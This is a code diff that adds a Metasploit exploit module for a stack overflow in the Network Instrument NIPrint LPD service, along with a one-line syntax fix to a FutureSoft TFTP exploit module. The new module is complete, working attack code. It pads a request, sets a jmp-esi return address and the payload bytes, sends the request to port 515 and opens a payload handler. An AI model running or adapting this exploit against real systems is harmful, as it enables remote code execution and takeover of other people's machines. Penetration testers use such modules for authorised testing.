diff --git a/modules/exploits/windows/lpd/niprint.rb b/modules/exploits/windows/lpd/niprint.rb new file mode 100644 index 0000000000..8acbcc15d8 --- /dev/null +++ b/modules/exploits/windows/lpd/niprint.rb @@ -0,0 +1,62 @@ +require 'msf/core' + +module Msf + +class Exploits::Windows::Lpd::HNIPrintd < Msf::Exploit::Remote + + include Exploit::Remote::Tcp + + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'NIPrint LPD Request Overflow', + 'Description' => %q{ + This module exploits a stack overflow in the + Network Instrument NIPrint LPD service. Inspired by + Immunity's VisualSploit :-) + }, + 'Author' => [ 'hdm' ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision: 3583 $', + 'References' => + [ + ['OSVDB', '2774'], + ['BID', '8968'], + ['URL', 'http://www.immunitysec.com/documentation/vs_niprint.html'], + ], + 'Privileged' => false, + + 'Payload' => + { + 'Space' => 500, + 'BadChars' => "\x00\x0a", + 'StackAdjustment' => -3500, + }, + 'Platform' => 'win', + 'Targets' => + [ + ['NIPrint3.EXE (TDS:0x3a045ff2)', { 'Ret' => 0x00404236 }], # jmp esi + ], + + 'DefaultTarget' => 0)) + + register_options( [ Opt::RPORT(515) ], self.class ) + end + + def exploit + connect + + req = Rex::Text.rand_text_alphanumeric(8192) + req[ 0, 2] = "\xeb\x33" + req[ 49, 4] = [target.ret].pack('V') + req[ 53, payload.encoded.length ] = payload.encoded + + print_status("Trying target #{target.name}...") + sock.put(req) + + handler + disconnect + end + +end +end diff --git a/modules/exploits/windows/tftp/futuresoft_transfermode.rb b/modules/exploits/windows/tftp/futuresoft_transfermode.rb index 8c0c48c230..2b8111e9d0 100644 --- a/modules/exploits/windows/tftp/futuresoft_transfermode.rb +++ b/modules/exploits/windows/tftp/futuresoft_transfermode.rb @@ -55,8 +55,6 @@ class Exploits::Windows::Tftp::Futuresoft_TFTPD_TransferMode < Msf::Exploit::Rem 'DisclosureDate' => 'May 31 2005')) - )) - register_options( [ Opt::RPORT(69)